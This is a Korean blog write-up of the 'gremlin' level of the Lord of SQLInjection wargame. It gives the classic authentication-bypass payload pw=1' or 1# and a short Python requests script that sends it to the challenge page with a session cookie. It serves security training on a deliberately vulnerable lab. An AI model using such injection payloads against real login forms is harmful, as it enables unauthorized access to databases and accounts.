문제
문제 분석
id와 pw에 "prob" , "_" , "." 를 피해 id에 값이 들어있으면 문제가 풀린다.
문제 풀이
'(싱글쿼터)로 우회를 시켜 값을 참이되게 만들어 id에 값을 가져오는 쿼리를 만든뒤 뒤에 오는 '(싱글쿼터)를 #(%23)으로 주석 처리해준다.
문제 정답
URL?pw=1' or 1#
url을 조작할시 #은 %23으로 입력해줘야한다.
문제 풀이 코드
import requests
url = 'https://los.rubiya.kr/chall/gremlin_280c5552de8b681110e9287421b834fd.php'
session = {'PHPSESSID' : 'p2huvnk8ab645nt9kdjit5js0k'} #로그인 쿠키
data={}
data['pw']="1' or 1#"
res = requests.get(url, params=data, cookies=session)
print(res.url)
if "Clear!" in res.text:
print("\nClear!")
else:
print("try again!")
'LOS-write up' 카테고리의 다른 글
| LOS 6(darkelf) (0) | 2021.01.03 |
|---|---|
| LOS 5(wolfman) (0) | 2021.01.03 |
| LOS 4(orc) (0) | 2021.01.03 |
| LOS 3(goblin) (0) | 2021.01.03 |
| LOS 2 (cobolt) (0) | 2021.01.03 |
